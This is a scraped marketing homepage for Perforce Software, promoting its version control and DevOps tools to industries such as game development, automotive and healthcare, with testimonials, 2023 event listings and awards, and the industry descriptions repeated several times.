Save 1,000s of development hours.

Background Image

Accelerate time-to-market regardless of size or complexity.

CUSTOMER REVIEWS

"It is really fast when comes to dealing with data and code. GUI is really simple and easy to use."

"Continues to deliver business value for our organization and delivers on ROI."

"Getting the strategy off the ground, Akana was the perfect partner."

**Over 75% of Fortune 100 Companies Use Perforce**

**

Solutions For Your Industry

**

**Game Development**

**Embedded Systems**

**Automotive**

**Healthcare**

**Government**

**Film & Animation**

**Semiconductor**

**Medical Devices**

**Financial Services**

**Software & Technology**

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Solutions For Your Industry

**

Game Development

**

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

Game Development

Game development software from Perforce helps you ship better games, fast. Learn how Perforce can accelerate workflows and help you conquer deadlines with version control + project management software.

**

Embedded Systems

**

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

Embedded Systems

Embedded developers working on software and hardware trust Perforce solutions to manage everything. This includes 9 of the top 10 semiconductor companies and 8 of the top 10 automotive companies.

**

Automotive

**

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

Automotive

For every phase of development. Fit for OEMs and suppliers alike. Developing safe, secure, and reliable automotive software and hardware is difficult. But using the right development tools makes it easy.

**

Healthcare

**

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

Healthcare

Healthcare organizations face the daunting task of maintaining profitability while complying with regulatory mandates such as HIPAA, ICD-10, Meaningful Use Stage 1 and 2, and more.

**

Government

**

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

Government

Many government organizations rely on Perforce for their diverse software development needs. Perforce provides highly secure solutions with complete traceability to help you mitigate risk.

**

Film & Animation

**

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

Film & Animation

Computer graphics — which were once exclusively postproduction — are now being combined with onset footage in real time. With crews spread out, filmmakers need to harness a combination of software tools to build something new.

**

Semiconductor

**

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

Semiconductor

The complexity of system on chip (SoC) designs is outpacing the capabilities of engineering. That’s because of two trends:

1.  Increasing design complexity gives rise to increasing data size.
2.  Unforgiving market windows.

**

Medical Devices

**

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

Medical Devices

There are endless challenges in the medical device industry. The quality of software embedded in medical devices can mean the difference between life and death. And there is increasing scrutiny for both safety and security in devices.

**

Financial Services

**

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

Financial Services

Financial services firms need to comply with strict regulatory mandates. They also need to be profitable. And keep up with consumer expectations. And stay ahead of increasingly tech-savvy competitors.

**

Software & Technology

**

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

Software & Technology

Enterprises face complex software development challenges today. You need to innovate to accelerate growth. Quality must be high to meet customer expectations. And you must deliver your product to market fast to beat the competition.

“I don’t know how we could do the kind of designs and the innovation we do without Perforce. Perforce has been critical to our success.”

Doug Quist

Director of IT and Engineering

“Device management was a huge benefit of the solution. We want to test on the actual devices customers are using. We are simply unwilling to put customers at risk.”

Sharon Chamberlain

Test Automation Manager

"Perforce has been key to us achieving DevOps."

Way Christiansen

Senior Staff Engineer

**When Failure Is Not an Option, You Need the Power of Perforce**

Perforce Software delivers solutions across DevOps designed to help you increase your competitive advantage by addressing quality, security, compliance, collaboration, and speed — across the technology lifecycle.Contact us to learn more about how our solutions can help you accelerate digital transformation, innovate at scale, and achieve DevOps success.

CONTACT USVIEW ALL PRODUCTS

**Sharpen Your Skills, Accelerate Your Teams**

Join upcoming events and webinars with industry-leading experts on how to conquer challenges and drive innovation.

November 10-11, 2023

**ICCAD 2023**

ICCAD 2023

Trade Show

November 12-17, 2023

**SC23**

The international conference for high performance computing, networking, storage, and analysis.

Trade Show

December 4-8, 2023

**Embedded Software Engineering Kongress 2023**

ESE Kongress is Germany’s leading congress for the embedded software industry. Every December, about 1,200 professionals get together to catch up on current technologies and methods, to discuss trends and to set the course for the future.

On the Road

**Award-Winning Innovation: That’s the Power of Perforce**

**SD Times Top 100, Best in Show: Development Tools**

Perforce Software, 2020

**EY Entrepreneur of the Year Heartland Award Winner**

CEO Mark Ties, 2020

**North American Software Testing & QE Awards Finalist**

Perfecto, 2020

**CEDEC Award for Engineering Winner**

Helix Core, 2019

**Get the Power of Perforce Today**

Learn more about how our solutions will help you innovate at scale, achieve higher quality, strengthen security, and accelerate velocity.

**Free Trials**

Get started with a free trial of one of our solutions.

**About Perforce**

Learn more about Perforce solutions for DevOps at scale.

Tag

#windows